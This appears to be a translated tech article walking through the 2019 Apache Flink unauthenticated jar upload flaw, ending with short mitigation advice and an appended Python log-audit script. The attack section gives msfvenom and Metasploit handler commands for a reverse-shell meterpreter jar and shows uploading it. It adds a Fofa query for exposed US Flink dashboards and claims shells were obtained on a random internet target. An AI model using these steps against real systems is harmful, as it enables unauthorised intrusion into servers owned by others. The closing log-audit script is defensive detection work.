2025-01-16 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article presents an example analysis of how arbitrary jar package upload in Apache Flink leads to remote code execution. The content is detailed, and interested readers can use it as a reference.
Vulnerability description:
On November 11, 2019, security engineer Henry Chen disclosed a vulnerability in which Apache Flink allows jar packages to be uploaded without authorization, leading to remote code execution. Because the Apache Flink Dashboard can be accessed without authentication by default, a shell can be obtained by uploading a malicious jar package and triggering execution of the malicious code.
Scope of impact:
Export (Export)
b. Then select Java --> Runnable JAR file
c. Then select the corresponding Java project, the export path, and the export file name
This generates a jar package that opens a reverse shell.
Generating a jar trojan with msf:
(1) Use msfvenom to generate a jar trojan:
msfvenom -p java/meterpreter/reverse_tcp LHOST=172.26.1.156 LPORT=9999 W > text.jar
(2) Open the msf listener module and listen on port 9999 (the same port that was set in our jar trojan):
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 172.26.1.156
set LPORT 9999
exploit
(3) After uploading the generated jar trojan and submitting it (see the reproduction below for this operation), we can see that we have successfully received the shell:
Local reproduction:
(1) Access the target:
(2) Click Submit New Job to open the page for uploading a jar package:
(3) Click Add New and select the jar package we have made:
(4) Listen on the port on our machine (the jar package we made opens a reverse shell directly):
(5) Click the jar package we just uploaded:
(6) Then click Submit, and we can see that we have successfully received the shell:
Internet sites:
Fofa keywords:
"apache-flink-dashboard" && country="US"
(1) Find a random target:
(2) Click Submit New Job and see that it allows us to upload jar packages.
(3) Upload our jar package using Flink's jar upload feature:
(4) After uploading, we listen on the port on our VPS.
(5) Then go back to the browser, select the jar package we just uploaded, and click Submit; our VPS has successfully received the shell.
Vulnerability fixes:
It is recommended that you set a firewall policy that allows only whitelisted IP addresses to access the Apache Flink service, and add digest authentication for the service at a web proxy such as Apache httpd.
Keep an eye on the official website and wait for a new version or patch to update.
This concludes the example analysis of remote code execution caused by arbitrary jar package upload in Apache Flink. I hope the above content is of some help.
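A detection-side check to accompany the fix above, as an added example that is not part of the original article: it scans the fronting proxy's access log for Flink jar upload (POST /jars/upload) and job submission (POST /jars/<jar id>/run) requests that came from outside the allowlist or without an authenticated user. The allowlist network, the Common Log Format layout and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress
import re

# Assumption (constructed): networks the firewall policy allows to reach Flink.
ALLOWLIST = [ipaddress.ip_network("10.20.0.0/24")]
# Assumption: Common Log Format, as written by a fronting proxy such as Apache httpd.
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
# Flink REST calls for uploading a jar and submitting it as a job.
UPLOAD_RE = re.compile(r"^/jars/upload/?$")
RUN_RE = re.compile(r"^/jars/[^/]+\.jar/run/?$")
# Constructed sample log lines (documentation address ranges, made-up jar id).
SAMPLE = [
    '10.20.0.5 - ops [16/Jan/2025:10:00:01 +0000] "POST /jars/upload HTTP/1.1" 200 120',
    '203.0.113.7 - - [16/Jan/2025:10:02:11 +0000] "GET /jars HTTP/1.1" 200 310',
    '203.0.113.7 - - [16/Jan/2025:10:02:15 +0000] "POST /jars/upload HTTP/1.1" 200 118',
    '203.0.113.7 - - [16/Jan/2025:10:02:19 +0000] "POST /jars/0a1b_job.jar/run?entry-class=Main HTTP/1.1" 200 45',
    '198.51.100.9 - - [16/Jan/2025:10:05:00 +0000] "POST /jars/upload HTTP/1.1" 401 0',
]

def allowed(ip, allowlist):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # hostname or malformed field: treat as not allowlisted
    return any(addr in net for net in allowlist)

def audit(lines, allowlist=ALLOWLIST):
    """Return jar upload/run requests that bypass the allowlist or authentication."""
    findings, uploaders = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]  # ignore query parameters
        action = ("jar_upload" if UPLOAD_RE.match(path)
                  else "jar_run" if RUN_RE.match(path) else None)
        reasons = [text for bad, text in (
            (not allowed(m["ip"], allowlist), "source outside allowlist"),
            (m["user"] == "-", "no authenticated user")) if bad]
        if action is None or not reasons:
            continue
        if action == "jar_upload" and m["status"].startswith("2"):
            uploaders.add(m["ip"])  # remember sources whose upload succeeded
        chained = action == "jar_run" and m["ip"] in uploaders
        findings.append({"ip": m["ip"], "action": action, "status": int(m["status"]),
                         "reasons": reasons, "upload_then_run": chained})
    return findings
```

A finding with upload_then_run set to True means the same source uploaded a jar successfully and then submitted it, which is the sequence the reproduction steps describe; a 401 on upload shows the proxy authentication rejecting the request.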